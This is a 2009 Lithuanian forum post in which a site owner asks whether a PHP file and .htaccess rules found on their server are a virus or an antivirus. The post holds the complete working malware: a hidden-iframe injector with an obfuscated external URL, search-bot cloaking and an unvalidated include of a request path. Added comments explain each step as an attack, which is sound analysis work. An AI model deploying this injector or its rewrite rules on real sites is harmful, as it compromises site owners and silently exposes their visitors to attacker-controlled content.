Parašė edeni· 2009 Lap. 8 17:11:50
#33
Naujas klausimas.
Mano ftp direktorijoje atsirado toks failas: PE609F31D777BD.php
Kas jame yra:
<?php
// NOTE(review): this is an injected payload, not an anti-iframe "antivirus".
// $frame_code holds an HTML/JavaScript snippet that callback() (below) inserts into
// pages served to visitors whose User-Agent is not on the crawler list.
// The script is padded with random-looking identifiers and /* ... */ comments. Its logic:
//   - JSRJxVcV() reverses a string.
//   - THAMWc() replaces every "." in its argument with "%", unescape()s the result and
//     reverses it, so the dotted hex string below is a reversed, hex-encoded URL.
//   - KNxrQJJuJ() writes a CSS class (1px x 1px, no border, visibility:hidden) and returns
//     an <iframe> of that class whose src placeholder "x" is replaced by the decoded URL.
//   - The returned markup is emitted with document.writeln().
// Decoded iframe target, defanged for reference: hxxp://sites-counter[.]com/user/174/in.php
// The HTML comments wrapping the script look like begin/end markers for the injected block;
// presumably they are useful search strings when sweeping other files - confirm per site.
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
/**
 * Resolve the directory that contains $file, relative to the current working directory.
 *
 * Works by changing into the candidate directory, reading back getcwd(), and then
 * restoring the previous working directory. All chdir() errors are suppressed with @,
 * so when the directory cannot be entered the function returns the unchanged
 * current directory instead.
 *
 * @param string $file Path of the originally requested page (taken from $_GET['qq'] by the caller).
 * @return string|false Result of getcwd() after the attempted chdir().
 */
function get_file_dir_($file) {
// $argv is declared global but never read in this function.
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
// Enter the target directory only to let getcwd() canonicalise the path.
@chdir($dir);
$dir = getcwd();
// Restore the working directory the script started in.
@chdir($curDir);
return $dir;
}
/**
 * Report whether a User-Agent string contains one of a fixed list of crawler tokens.
 *
 * NOTE(review): callback() uses this to return pages WITHOUT the injected frame to these
 * agents, i.e. it is a cloaking check: search-engine crawlers see clean output while
 * ordinary browsers receive the hidden iframe. A site can therefore look clean in a
 * search engine's cached or scanned copy while still serving the injection to visitors.
 *
 * @param string $agent Value of the User-Agent request header.
 * @return bool true if any listed token occurs in $agent (case-sensitive), false otherwise.
 */
function is_search_bot($agent)
{
// strstr() returns false when the token is absent; under loose comparison
// false != null is false, so each clause is true only when the token is present.
if(
strstr($agent, "Yandex/") != null ||
strstr($agent, "YaDirectBot") != null ||
strstr($agent, "James Bond") != null ||
strstr($agent, "Googlebot") != null ||
strstr($agent, "Mediapartners-Google") != null ||
strstr($agent, "StackRambler") != null ||
strstr($agent, "Slurp") != null ||
strstr($agent, "msnbot") != null
)
{
return true;
}
return false;
}
/**
 * Output-buffer handler: rewrites the HTML of the page being served.
 *
 * Registered through ob_start('callback') by the top-level code, so $data is the
 * buffered output of the included page and the return value is what the client receives.
 *
 * NOTE(review): this is where the injection happens. Every visitor whose User-Agent is
 * not matched by is_search_bot() receives $frame_code inside the page.
 *
 * @param string $data Buffered page output.
 * @return string|null Page output, with $frame_code added for non-crawler agents.
 */
function callback($data)
{
global $frame_code;
// Strip markup that is already in the page before adding this script's own frame:
// iframes with a style attribute containing "hidden", divs with display:none that wrap
// an iframe, and script blocks between "<!-- ad -->" and "<!-- /ad -->" markers.
// Without the /s modifier "." does not cross newlines, so only single-line matches are
// removed. Presumably this targets earlier or competing injections - not confirmed here.
$data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
$data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
$data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
// Cloaking: listed crawlers get the stripped page with no frame added.
// HTTP_USER_AGENT is read without an isset() check.
if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
return $data;
} else {
// Preferred placement: directly after the first opening <body> tag (limit 1).
if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
}
else {
// No <body> tag in the output: append the frame code at the end instead.
return $data.$frame_code;
}
}
}
// Entry point. The .htaccess block quoted below on this page routes page requests here
// with the originally requested path in the "qq" query parameter.
// Start output buffering with callback() as the handler, then run the real page so that
// its output passes through callback() before reaching the client.
if(@ob_start('callback') == true) {
// NOTE(review): the include path comes straight from the query string with no validation.
// Besides the injection itself, the file is therefore an unauthenticated include of a
// request-supplied path; it should be removed, not left in place or merely edited.
$file = $_GET['qq'];
// Switch to the page's own directory so its relative includes keep working.
@chdir(get_file_dir_($file));
include($file);
} else {
// Buffering could not be started: only the frame code is emitted, no page is included.
echo $frame_code;
}
?>
ir į .htaccess kažkaip įsirašė:
# NOTE(review): injected rewrite block. The hex id in the begin/end marker comments matches
# the name of the dropped file (PE609F31D777BD.php). Cleaning up means removing both this
# block and that file. How they were written is not shown on this page, so the FTP/hosting
# credentials should be treated as suspect.
#609F31D777BD{
RewriteEngine On
# Only GET requests for files that exist on disk are affected.
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
# Skip requests for the PE*.php file itself, which also prevents a rewrite loop.
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
# Internally serve every .php/.html/.htm/.php3/.phtml/.shtml request through the dropped
# script, keeping the original query string and passing the requested path as qq.
# It is an internal rewrite (no redirect flag), so the visitor's URL does not change.
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) PE609F31D777BD.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#609F31D777BD}
Tai man iškilo klausimas: čia virusas ar ne? Ar čia antivirusinė nuo tų iframe kodų?
Redagavo edeni· 2009 Lap. 8 17:11:17